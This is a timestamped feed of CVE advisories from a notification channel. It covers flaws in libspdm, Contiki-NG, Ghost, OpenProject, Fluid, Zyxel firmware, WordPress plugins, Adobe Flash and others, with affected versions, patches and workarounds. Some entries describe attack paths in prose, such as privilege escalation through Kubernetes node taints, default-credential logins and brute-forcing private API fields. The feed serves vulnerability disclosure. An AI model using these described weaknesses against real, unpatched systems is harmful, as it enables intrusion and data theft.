🚨 CVE-2023-31127libspdm is a sample implementation that follows the DMTF SPDM specifications. A vulnerability has been identified in SPDM session establishment in libspdm prior to version 2.3.1. If a device supports both DHE session and PSK session with mutualauthentication, the attacker may be able to establish the session with `KEY_EXCHANGE` and `PSK_FINISH` to bypass the mutual authentication. This is most likely to happen when the Requester begins a session using one method (DHE, for example) and then uses the other method's finish (PSK_FINISH in this example) to establish the session. The session hashes would be expected to fail in this case, but the condition was not detected.This issue only impacts the SPDM responder, which supports `KEY_EX_CAP=1 and `PSK_CAP=10b` at same time with mutual authentication requirement. The SPDM requester is not impacted. The SPDM responder is not impacted if `KEY_EX_CAP=0` or `PSK_CAP=0` or `PSK_CAP=01b`. The SPDM responder is not impacted if mutual authentication is not required.libspdm 1.0, 2.0, 2.1, 2.2, 2.3 are all impacted. Older branches are not maintained, but users of the 2.3 branch may receive a patch in version 2.3.2. The SPDM specification (DSP0274) does not contain this vulnerability.🎖@cveNotify |
|
| 2023-05-09 01:58:31 |
🚨 CVE-2023-31129The Contiki-NG operating system versions 4.8 and prior can be triggered to dereference a NULL pointer in the message handling code for IPv6 router solicitiations. Contiki-NG contains an implementation of IPv6 Neighbor Discovery (ND) in the module `os/net/ipv6/uip-nd6.c`. The ND protocol includes a message type called Router Solicitation (RS), which is used to locate routers and update their address information via the SLLAO (Source Link-Layer Address Option). If the indicated source address changes, a given neighbor entry is set to the STALE state.The message handler does not check for RS messages with an SLLAO that indicates a link-layer address change that a neighbor entry can actually be created for the indicated address. The resulting pointer is used without a check, leading to the dereference of a NULL pointer of type `uip_ds6_nbr_t`.The problem has been patched in the `develop` branch of Contiki-NG, and will be included in the upcoming 4.9 release. As a workaround, users can apply Contiki-NG pull request #2271 to patch the problem directly.🎖@cveNotify |
|
| 2023-05-09 01:58:29 |
🚨 CVE-2023-31133Ghost is an app for new-media creators with tools to build a website, publish content, send newsletters, and offer paid subscriptions to members. Prior to version 5.46.1, due to a lack of validation when filtering on the public API endpoints, it is possible to reveal private fields via a brute force attack.Ghost(Pro) has already been patched. Maintainers can find no evidence that the issue was exploited on Ghost(Pro) prior to the patch being added. Self-hosters are impacted if running Ghost a version below v5.46.1. v5.46.1 contains a fix for this issue. As a workaround, add a block for requests to `/ghost/api/content/*` where the `filter` query parameter contains `password` or `email`.🎖@cveNotify |
|
| 2023-05-09 01:58:28 |
🚨 CVE-2023-31140OpenProject is open source project management software. Starting with version 7.4.0 and prior to version 12.5.4, when a user registers and confirms their first two-factor authentication (2FA) device for an account, existing logged in sessions for that user account are not terminated. Likewise, if an administrators creates a mobile phone 2FA device on behalf of a user, their existing sessions are not terminated. The issue has been resolved in OpenProject version 12.5.4 by actively terminating sessions of user accounts having registered and confirmed a 2FA device. As a workaround, users who register the first 2FA device on their account can manually log out to terminate all other active sessions. This is the default behavior of OpenProject but might be disabled through a configuration option. Double check that this option is not overridden if one plans to employ the workaround.🎖@cveNotify |
|
| 2023-05-09 01:58:27 |
🚨 CVE-2023-31141OpenSearch is open-source software suite for search, analytics, and observability applications. Prior to versions 1.3.10 and 2.7.0, there is an issue with the implementation of fine-grained access control rules (document-level security, field-level security and field masking) where they are not correctly applied to the queries during extremely rare race conditions potentially leading to incorrect access authorization. For this issue to be triggered, two concurrent requests need to land on the same instance exactly when query cache eviction happens, once every four hours. OpenSearch 1.3.10 and 2.7.0 contain a fix for this issue.🎖@cveNotify |
|
| 2023-05-09 01:58:25 |
🚨 CVE-2023-31178AgilePoint NX v8.0 SU2.2 & SU2.3 – Arbitrary File Delete Vulnerability allows arbitrary file deletion, by an unspecified request.🎖@cveNotify |
|
| 2023-05-09 01:58:24 |
🚨 CVE-2023-31179AgilePoint NX v8.0 SU2.2 & SU2.3 - Path traversal - Vulnerability allows path traversal and downloading files from the server, by an unspecified request.🎖@cveNotify |
|
| 2023-05-09 01:58:22 |
🚨 CVE-2023-31180WJJ Software - InnoKB Server, InnoKB/Console 2.2.1 - Reflected cross-site scripting (RXSS) through an unspecified request.🎖@cveNotify |
|
| 2023-05-09 01:58:21 |
🚨 CVE-2023-31181WJJ Software - InnoKB Server, InnoKB/Console 2.2.1 - CWE-22: Path Traversal🎖@cveNotify |
|
| 2023-05-09 01:58:20 |
🚨 CVE-2023-31182 EasyTor Applications – Authorization Bypass - EasyTor Applications may allow authorization bypass via unspecified method.🎖@cveNotify |
|
| 2023-05-09 01:58:18 |
🚨 CVE-2023-31183 Cybonet PineApp Mail Secure A reflected cross-site scripting (XSS) vulnerability was identified in the product, using an unspecified endpoint.🎖@cveNotify |
|
| 2023-05-09 01:58:17 |
🚨 CVE-2023-26022IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service as the server may crash when an Out of Memory occurs using the DBMS_OUTPUT module. IBM X-Force ID: 247868.🎖@cveNotify |
|
| 2023-05-09 01:58:16 |
🚨 CVE-2023-26021IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service as the server may crash when compiling a specially crafted SQL query using a LIMIT clause. IBM X-Force ID: 247864.🎖@cveNotify |
|
| 2023-05-09 01:58:15 |
🚨 CVE-2023-29950swfrender v0.9.2 was discovered to contain a heap buffer overflow in the function enumerateUsedIDs_fillstyle at modules/swftools.c🎖@cveNotify |
|
| 2023-05-09 01:58:14 |
🚨 CVE-2023-2349A vulnerability classified as problematic has been found in SourceCodester Service Provider Management System 1.0. Affected is an unknown function of the file /admin/index.php. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227592.🎖@cveNotify |
|
| 2023-05-09 01:58:12 |
🚨 CVE-2023-2350A vulnerability classified as problematic was found in SourceCodester Service Provider Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Users.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227593 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-08 20:58:32 |
🚨 CVE-2023-1778This vulnerability exists in GajShield Data Security Firewall firmware versions prior to v4.28 (except v4.21) due to insecure default credentials which allows remote attacker to login as superuser by using default username/password via web-based management interface and/or exposed SSH port thereby enabling remote attackers to execute arbitrary commands with administrative/superuser privileges on the targeted systems.The vulnerability has been addressed by forcing the user to change their default password to a new non-default password.🎖@cveNotify |
|
| 2023-05-08 20:58:31 |
🚨 CVE-2023-28770The sensitive information exposure vulnerability in the CGI “Export_Log” and the binary “zcmd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to read the system files and to retrieve the password of the supervisor from the encrypted file.🎖@cveNotify |
|
| 2023-05-08 20:58:30 |
🚨 CVE-2023-2328Cross-site Scripting (XSS) - Generic in GitHub repository pimcore/pimcore prior to 10.5.21.🎖@cveNotify |
|
| 2023-05-08 20:58:29 |
🚨 CVE-2023-30840Fluid is an open source Kubernetes-native distributed dataset orchestrator and accelerator for data-intensive applications. Starting in version 0.7.0 and prior to version 0.8.6, if a malicious user gains control of a Kubernetes node running fluid csi pod (controlled by the `csi-nodeplugin-fluid` node-daemonset), they can leverage the fluid-csi service account to modify specs of all the nodes in the cluster. However, since this service account lacks `list node` permissions, the attacker may need to use other techniques to identify vulnerable nodes.Once the attacker identifies and modifies the node specs, they can manipulate system-level-privileged components to access all secrets in the cluster or execute pods on other nodes. This allows them to elevate privileges beyond the compromised node and potentially gain full privileged access to the whole cluster.To exploit this vulnerability, the attacker can make all other nodes unschedulable (for example, patch node with taints) and wait for system-critical components with high privilege to appear on the compromised node. However, this attack requires two prerequisites: a compromised node and identifying all vulnerable nodes through other means.Version 0.8.6 contains a patch for this issue. As a workaround, delete the `csi-nodeplugin-fluid` daemonset in `fluid-system` namespace and avoid using CSI mode to mount FUSE file systems. Alternatively, using sidecar mode to mount FUSE file systems is recommended.🎖@cveNotify |
|
| 2023-05-08 20:58:26 |
🚨 CVE-2023-30844Mutagen provides real-time file synchronization and flexible network forwarding for developers. Prior to versions 0.16.6 and 0.17.1 in `mutagen` and prior to version 0.17.1 in `mutagen-compose`, Mutagen `list` and `monitor` commands are susceptible to control characters that could be provided by remote endpoints. This could cause terminal corruption, either intentional or unintentional, if these characters were present in error messages or file paths/names. This could be used as an attack vector if synchronizing with an untrusted remote endpoint, synchronizing files not under control of the user, or forwarding to/from an untrusted remote endpoint. On very old systems with terminals susceptible to issues such as CVE-2003-0069, the issue could theoretically cause code execution. The problem has been patched in Mutagen v0.16.6 and v0.17.1. Earlier versions of Mutagen are no longer supported and will not be patched. Versions of Mutagen after v0.18.0 will also have the patch merged. As a workaround, avoiding synchronization of untrusted files or interaction with untrusted remote endpoints should mitigate any risk.🎖@cveNotify |
|
| 2023-05-08 20:58:25 |
🚨 CVE-2023-28769The buffer overflow vulnerability in the library “libclinkc.so” of the web server “zhttpd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to execute some OS commands or to cause denial-of-service (DoS) conditions on a vulnerable device.🎖@cveNotify |
|
| 2023-05-08 20:58:24 |
🚨 CVE-2023-1861The Limit Login Attempts WordPress plugin through 1.7.2 does not sanitize and escape usernames when outputting them back in the logs dashboard, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-05-08 20:58:20 |
🚨 CVE-2023-1911The Blocksy Companion WordPress plugin before 1.8.82 does not ensure that posts to be accessed via a shortcode are already public and can be viewed, allowing any authenticated users, such as subscriber to access draft posts for example🎖@cveNotify |
|
| 2023-05-08 20:58:19 |
🚨 CVE-2023-1196The Advanced Custom Fields (ACF) Free and Pro WordPress plugins 6.x before 6.1.0 and 5.x before 5.12.5 unserialize user controllable data, which could allow users with a role of Contributor and above to perform PHP Object Injection when a suitable gadget is present.🎖@cveNotify |
|
| 2023-05-08 20:58:18 |
🚨 CVE-2023-30609matrix-react-sdk is a react-based SDK for inserting a Matrix chat/VoIP client into a web page. Prior to version 3.71.0, plain text messages containing HTML tags are rendered as HTML in the search results. To exploit this, an attacker needs to trick a user into searching for a specific message containing an HTML injection payload. No cross-site scripting attack is possible due to the hardcoded content security policy. Version 3.71.0 of the SDK patches over the issue. As a workaround, restarting the client will clear the HTML injection.🎖@cveNotify |
|
| 2023-05-08 20:58:15 |
🚨 CVE-2023-1809The Download Manager WordPress plugin before 6.3.0 leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.🎖@cveNotify |
|
| 2023-05-08 20:58:14 |
🚨 CVE-2023-1804The Product Catalog Feed by PixelYourSite WordPress plugin before 2.1.1 does not sanitise and escape the edit parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as administrators.🎖@cveNotify |
|
| 2023-05-08 20:58:13 |
🚨 CVE-2023-24269An arbitrary file upload vulnerability in the plugin upload function of Textpattern v4.8.8 allows attackers to execute arbitrary code via a crafted Zip file.🎖@cveNotify |
|
| 2023-05-08 18:58:53 |
🚨 CVE-2023-1021The amr ical events lists WordPress plugin through 6.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-05-08 18:58:52 |
🚨 CVE-2023-0924The ZYREX POPUP WordPress plugin through 1.0 does not validate the type of files uploaded when creating a popup, allowing a high privileged user (such as an Administrator) to upload arbitrary files, even when modifying the file system is disallowed, such as in a multisite install.🎖@cveNotify |
|
| 2023-05-08 18:58:51 |
🚨 CVE-2023-0891The StagTools WordPress plugin before 2.3.7 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-05-08 18:58:50 |
🚨 CVE-2023-2451A vulnerability was found in SourceCodester Online DJ Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/bookings/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227795.🎖@cveNotify |
|
| 2023-05-08 18:58:49 |
🚨 CVE-2023-20852aEnrich Technology a+HRD has a vulnerability of Deserialization of Untrusted Data within its MSMQ interpreter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary system commands to perform arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-05-08 18:58:45 |
🚨 CVE-2023-31470SmartDNS through 41 before 56d0332 allows an out-of-bounds write because of a stack-based buffer overflow in the _dns_encode_domain function in the dns.c file, via a crafted DNS request.🎖@cveNotify |
|
| 2023-05-08 18:58:44 |
🚨 CVE-2023-30858The Denosaurs emoji package provides emojis for dinosaurs. Starting in version 0.1.0 and prior to version 0.3.0, the reTrimSpace regex has 2nd degree polynomial inefficiency, leading to a delayed response given a big payload. The issue has been patched in 0.3.0. As a workaround, avoid using the `replace`, `unemojify`, or `strip` functions.🎖@cveNotify |
|
| 2023-05-08 18:58:43 |
🚨 CVE-2023-24836SUNNET CTMS has vulnerability of path traversal within its file uploading function. An authenticated remote attacker with general user privilege can exploit this vulnerability to upload and execute scripts onto arbitrary directories to perform arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-05-08 18:58:42 |
🚨 CVE-2022-3643Guests can trigger NIC interface reset/abort/crash via netback It is possible for a guest to trigger a NIC interface reset/abort/crash in a Linux based network backend by sending certain kinds of packets. It appears to be an (unwritten?) assumption in the rest of the Linux network stack that packet protocol headers are all contained within the linear section of the SKB and some NICs behave badly if this is not the case. This has been reported to occur with Cisco (enic) and Broadcom NetXtrem II BCM5780 (bnx2x) though it may be an issue with other NICs/drivers as well. In case the frontend is sending requests with split headers, netback will forward those violating above mentioned assumption to the networking core, resulting in said misbehavior.🎖@cveNotify |
|
| 2023-05-08 18:58:41 |
🚨 CVE-2023-30857@aedart/support is the support package for Ion, a monorepo for JavaScript/TypeScript packages. Prior to version `0.6.1`, there is a possible prototype pollution issue for the `MetadataRecord`, when merged with a base class' metadata object, in `meta` decorator from the `@aedart/support` package. The likelihood of exploitation is questionable, given that a class's metadata can only be set or altered when the class is decorated via `meta()`. Furthermore, object(s) of sensitive nature would have to be stored as metadata, before this can lead to a security impact. The issue has been patched in version `0.6.1`.🎖@cveNotify |
|
| 2023-05-08 18:58:37 |
🚨 CVE-2023-29058A valid, authenticated XCC user with read-only permissions can modify custom user roles on other user accounts and the user trespass message through the XCC CLI. There is no exposure if SSH is disabled or if there are no users assigned optional read-only permissions.🎖@cveNotify |
|
| 2023-05-08 18:58:36 |
🚨 CVE-2014-125100A vulnerability classified as problematic was found in BestWebSoft Job Board Plugin 1.0.0 on WordPress. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is dbb71deee071422ce3e663fbcdce3ad24886f940. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227764.🎖@cveNotify |
|
| 2023-05-08 18:58:35 |
🚨 CVE-2023-31483tar/TarFileReader.cpp in Cauldron cbang before bastet-v8.1.17 has a directory traversal during extraction that allows the attacker to create or write to files outside the current directory via a crafted tar archive.🎖@cveNotify |
|
| 2023-05-08 18:58:34 |
🚨 CVE-2023-1979The Web Stories for WordPress plugin supports the WordPress built-in functionality of protecting content with a password. The content is then only accessible to website visitors after entering the password. In WordPress, users with the "Author" role can create stories, but don't have the ability to edit password protected stories. The vulnerability allowed users with said role to bypass this permission check when trying to duplicate the protected story in the plugin's own dashboard, giving them access to the seemingly protected content. We recommend upgrading to version 1.32 or beyond commit ad49781c2a35c5c92ef704d4b621ab4e5cb77d68 https://github.com/GoogleForCreators/web-stories-wp/commit/ad49781c2a35c5c92ef704d4b621ab4e5cb77d68 🎖@cveNotify |
|
| 2023-05-08 18:58:33 |
🚨 CVE-2023-2583Code Injection in GitHub repository jsreport/jsreport prior to 3.11.3.🎖@cveNotify |
|
| 2023-05-08 18:58:29 |
🚨 CVE-2023-30837Vyper is a pythonic smart contract language for the EVM. The storage allocator does not guard against allocation overflows in versions prior to 0.3.8. An attacker can overwrite the owner variable. This issue was fixed in version 0.3.8.🎖@cveNotify |
|
| 2023-05-08 18:58:28 |
🚨 CVE-2023-31484CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.🎖@cveNotify |
|
| 2023-05-08 18:58:27 |
🚨 CVE-2023-26781SQL injection vulnerability in mccms 2.6 allows remote attackers to run arbitrary SQL commands via Author Center ->Reader Comments ->Search.🎖@cveNotify |
|
| 2023-05-08 18:58:26 |
🚨 CVE-2023-31485GitLab::API::v4 through 0.26 does not verify TLS certificates when connecting to a GitLab server, enabling machine-in-the-middle attacks.🎖@cveNotify |
|
| 2023-05-08 17:58:17 |
🚨 CVE-2023-26735** DISPUTED ** blackbox_exporter v0.23.0 was discovered to contain an access control issue in its probe interface. This vulnerability allows attackers to detect intranet ports and services, as well as download resources. NOTE: this is disputed by third parties because authentication can be configured.🎖@cveNotify |
|
| 2023-05-08 17:58:13 |
🚨 CVE-2020-18132Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.🎖@cveNotify |
|
| 2023-05-08 17:58:12 |
🚨 CVE-2020-22755File upload vulnerability in MCMS 5.0 allows attackers to execute arbitrary code via a crafted thumbnail. A different vulnerability than CVE-2022-31943.🎖@cveNotify |
|
| 2023-05-08 17:58:11 |
🚨 CVE-2021-28998File upload vulnerability in CMS Made Simple through 2.2.15 allows remote authenticated attackers to gain a webshell via a crafted phar file.🎖@cveNotify |
|
| 2023-05-08 15:58:32 |
🚨 CVE-2020-7808In RAONWIZ K Upload v2018.0.2.51 and prior, automatic update processing without integrity check on update module(web.js) allows an attacker to modify arguments which causes downloading a random DLL and injection on it.🎖@cveNotify |
|
| 2023-05-08 15:58:30 |
🚨 CVE-2015-8655Use-after-free vulnerability in Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allows attackers to execute arbitrary code via crafted MPEG-4 data, a different vulnerability than CVE-2015-8048, CVE-2015-8049, CVE-2015-8050, CVE-2015-8055, CVE-2015-8056, CVE-2015-8057, CVE-2015-8058, CVE-2015-8059, CVE-2015-8061, CVE-2015-8062, CVE-2015-8063, CVE-2015-8064, CVE-2015-8065, CVE-2015-8066, CVE-2015-8067, CVE-2015-8068, CVE-2015-8069, CVE-2015-8070, CVE-2015-8071, CVE-2015-8401, CVE-2015-8402, CVE-2015-8403, CVE-2015-8404, CVE-2015-8405, CVE-2015-8406, CVE-2015-8410, CVE-2015-8411, CVE-2015-8412, CVE-2015-8413, CVE-2015-8414, CVE-2015-8420, CVE-2015-8421, CVE-2015-8422, CVE-2015-8423, CVE-2015-8424, CVE-2015-8425, CVE-2015-8426, CVE-2015-8427, CVE-2015-8428, CVE-2015-8429, CVE-2015-8430, CVE-2015-8431, CVE-2015-8432, CVE-2015-8433, CVE-2015-8434, CVE-2015-8435, CVE-2015-8436, CVE-2015-8437, CVE-2015-8441, CVE-2015-8442, CVE-2015-8447, CVE-2015-8448, CVE-2015-8449, CVE-2015-8450, CVE-2015-8452, CVE-2015-8454, CVE-2015-8653, CVE-2015-8821, and CVE-2015-8822.🎖@cveNotify |
|
| 2023-05-08 15:58:29 |
🚨 CVE-2015-8653Use-after-free vulnerability in Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allows attackers to execute arbitrary code via crafted MPEG-4 data, a different vulnerability than CVE-2015-8048, CVE-2015-8049, CVE-2015-8050, CVE-2015-8055, CVE-2015-8056, CVE-2015-8057, CVE-2015-8058, CVE-2015-8059, CVE-2015-8061, CVE-2015-8062, CVE-2015-8063, CVE-2015-8064, CVE-2015-8065, CVE-2015-8066, CVE-2015-8067, CVE-2015-8068, CVE-2015-8069, CVE-2015-8070, CVE-2015-8071, CVE-2015-8401, CVE-2015-8402, CVE-2015-8403, CVE-2015-8404, CVE-2015-8405, CVE-2015-8406, CVE-2015-8410, CVE-2015-8411, CVE-2015-8412, CVE-2015-8413, CVE-2015-8414, CVE-2015-8420, CVE-2015-8421, CVE-2015-8422, CVE-2015-8423, CVE-2015-8424, CVE-2015-8425, CVE-2015-8426, CVE-2015-8427, CVE-2015-8428, CVE-2015-8429, CVE-2015-8430, CVE-2015-8431, CVE-2015-8432, CVE-2015-8433, CVE-2015-8434, CVE-2015-8435, CVE-2015-8436, CVE-2015-8437, CVE-2015-8441, CVE-2015-8442, CVE-2015-8447, CVE-2015-8448, CVE-2015-8449, CVE-2015-8450, CVE-2015-8452, CVE-2015-8454, CVE-2015-8655, CVE-2015-8821, and CVE-2015-8822.🎖@cveNotify |
|
| 2023-05-08 15:58:27 |
🚨 CVE-2015-8657Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allow attackers to execute arbitrary code or cause a denial of service (out-of-bounds read and memory corruption) via crafted MPEG-4 data, a different vulnerability than CVE-2015-8045, CVE-2015-8047, CVE-2015-8060, CVE-2015-8408, CVE-2015-8416, CVE-2015-8417, CVE-2015-8418, CVE-2015-8419, CVE-2015-8443, CVE-2015-8444, CVE-2015-8451, CVE-2015-8455, CVE-2015-8652, CVE-2015-8654, CVE-2015-8656, CVE-2015-8658, and CVE-2015-8820.🎖@cveNotify |
|
| 2023-05-08 15:58:26 |
🚨 CVE-2015-8652Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allow attackers to execute arbitrary code or cause a denial of service (out-of-bounds read and memory corruption) via crafted MPEG-4 data, a different vulnerability than CVE-2015-8045, CVE-2015-8047, CVE-2015-8060, CVE-2015-8408, CVE-2015-8416, CVE-2015-8417, CVE-2015-8418, CVE-2015-8419, CVE-2015-8443, CVE-2015-8444, CVE-2015-8451, CVE-2015-8455, CVE-2015-8654, CVE-2015-8656, CVE-2015-8657, CVE-2015-8658, and CVE-2015-8820.🎖@cveNotify |
|
| 2023-05-08 15:58:25 |
🚨 CVE-2015-8820Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allow attackers to execute arbitrary code or cause a denial of service (out-of-bounds read and memory corruption) via crafted MPEG-4 data, a different vulnerability than CVE-2015-8045, CVE-2015-8047, CVE-2015-8060, CVE-2015-8408, CVE-2015-8416, CVE-2015-8417, CVE-2015-8418, CVE-2015-8419, CVE-2015-8443, CVE-2015-8444, CVE-2015-8451, CVE-2015-8455, CVE-2015-8652, CVE-2015-8654, CVE-2015-8656, CVE-2015-8657, and CVE-2015-8658.🎖@cveNotify |
|
| 2023-05-08 15:58:24 |
🚨 CVE-2015-8654Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allow attackers to execute arbitrary code or cause a denial of service (out-of-bounds read and memory corruption) via crafted MPEG-4 data, a different vulnerability than CVE-2015-8045, CVE-2015-8047, CVE-2015-8060, CVE-2015-8408, CVE-2015-8416, CVE-2015-8417, CVE-2015-8418, CVE-2015-8419, CVE-2015-8443, CVE-2015-8444, CVE-2015-8451, CVE-2015-8455, CVE-2015-8652, CVE-2015-8656, CVE-2015-8657, CVE-2015-8658, and CVE-2015-8820.🎖@cveNotify |
|
| 2023-05-08 15:58:20 |
🚨 CVE-2015-8822Use-after-free vulnerability in Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allows attackers to execute arbitrary code via crafted MPEG-4 data, a different vulnerability than CVE-2015-8048, CVE-2015-8049, CVE-2015-8050, CVE-2015-8055, CVE-2015-8056, CVE-2015-8057, CVE-2015-8058, CVE-2015-8059, CVE-2015-8061, CVE-2015-8062, CVE-2015-8063, CVE-2015-8064, CVE-2015-8065, CVE-2015-8066, CVE-2015-8067, CVE-2015-8068, CVE-2015-8069, CVE-2015-8070, CVE-2015-8071, CVE-2015-8401, CVE-2015-8402, CVE-2015-8403, CVE-2015-8404, CVE-2015-8405, CVE-2015-8406, CVE-2015-8410, CVE-2015-8411, CVE-2015-8412, CVE-2015-8413, CVE-2015-8414, CVE-2015-8420, CVE-2015-8421, CVE-2015-8422, CVE-2015-8423, CVE-2015-8424, CVE-2015-8425, CVE-2015-8426, CVE-2015-8427, CVE-2015-8428, CVE-2015-8429, CVE-2015-8430, CVE-2015-8431, CVE-2015-8432, CVE-2015-8433, CVE-2015-8434, CVE-2015-8435, CVE-2015-8436, CVE-2015-8437, CVE-2015-8441, CVE-2015-8442, CVE-2015-8447, CVE-2015-8448, CVE-2015-8449, CVE-2015-8450, CVE-2015-8452, CVE-2015-8454, CVE-2015-8653, CVE-2015-8655, and CVE-2015-8821.🎖@cveNotify |
|
| 2023-05-08 15:58:19 |
🚨 CVE-2015-8658Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allow attackers to execute arbitrary code or cause a denial of service (uninitialized pointer dereference and memory corruption) via crafted MPEG-4 data, a different vulnerability than CVE-2015-8045, CVE-2015-8047, CVE-2015-8060, CVE-2015-8408, CVE-2015-8416, CVE-2015-8417, CVE-2015-8418, CVE-2015-8419, CVE-2015-8443, CVE-2015-8444, CVE-2015-8451, CVE-2015-8455, CVE-2015-8652, CVE-2015-8654, CVE-2015-8656, CVE-2015-8657, and CVE-2015-8820.🎖@cveNotify |
|
| 2023-05-08 15:58:18 |
🚨 CVE-2015-8821Use-after-free vulnerability in Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allows attackers to execute arbitrary code via crafted MPEG-4 data, a different vulnerability than CVE-2015-8048, CVE-2015-8049, CVE-2015-8050, CVE-2015-8055, CVE-2015-8056, CVE-2015-8057, CVE-2015-8058, CVE-2015-8059, CVE-2015-8061, CVE-2015-8062, CVE-2015-8063, CVE-2015-8064, CVE-2015-8065, CVE-2015-8066, CVE-2015-8067, CVE-2015-8068, CVE-2015-8069, CVE-2015-8070, CVE-2015-8071, CVE-2015-8401, CVE-2015-8402, CVE-2015-8403, CVE-2015-8404, CVE-2015-8405, CVE-2015-8406, CVE-2015-8410, CVE-2015-8411, CVE-2015-8412, CVE-2015-8413, CVE-2015-8414, CVE-2015-8420, CVE-2015-8421, CVE-2015-8422, CVE-2015-8423, CVE-2015-8424, CVE-2015-8425, CVE-2015-8426, CVE-2015-8427, CVE-2015-8428, CVE-2015-8429, CVE-2015-8430, CVE-2015-8431, CVE-2015-8432, CVE-2015-8433, CVE-2015-8434, CVE-2015-8435, CVE-2015-8436, CVE-2015-8437, CVE-2015-8441, CVE-2015-8442, CVE-2015-8447, CVE-2015-8448, CVE-2015-8449, CVE-2015-8450, CVE-2015-8452, CVE-2015-8454, CVE-2015-8653, CVE-2015-8655, and CVE-2015-8822.🎖@cveNotify |
|
| 2023-05-08 15:58:17 |
🚨 CVE-2015-8656Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allow attackers to execute arbitrary code or cause a denial of service (out-of-bounds read and memory corruption) via crafted MPEG-4 data, a different vulnerability than CVE-2015-8045, CVE-2015-8047, CVE-2015-8060, CVE-2015-8408, CVE-2015-8416, CVE-2015-8417, CVE-2015-8418, CVE-2015-8419, CVE-2015-8443, CVE-2015-8444, CVE-2015-8451, CVE-2015-8455, CVE-2015-8652, CVE-2015-8654, CVE-2015-8657, CVE-2015-8658, and CVE-2015-8820.🎖@cveNotify |
|
| 2023-05-08 15:58:16 |
🚨 CVE-2015-5122Use-after-free vulnerability in the DisplayObject class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.302 on Windows and OS X, 14.x through 18.0.0.203 on Windows and OS X, 11.x through 11.2.202.481 on Linux, and 12.x through 18.0.0.204 on Linux Chrome installations allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that leverages improper handling of the opaqueBackground property, as exploited in the wild in July 2015.🎖@cveNotify |
|
| 2023-05-08 12:58:12 |
🚨 CVE-2023-2251Uncaught Exception in GitHub repository eemeli/yaml prior to 2.0.0-5.🎖@cveNotify |
|
| 2023-05-08 10:58:15 |
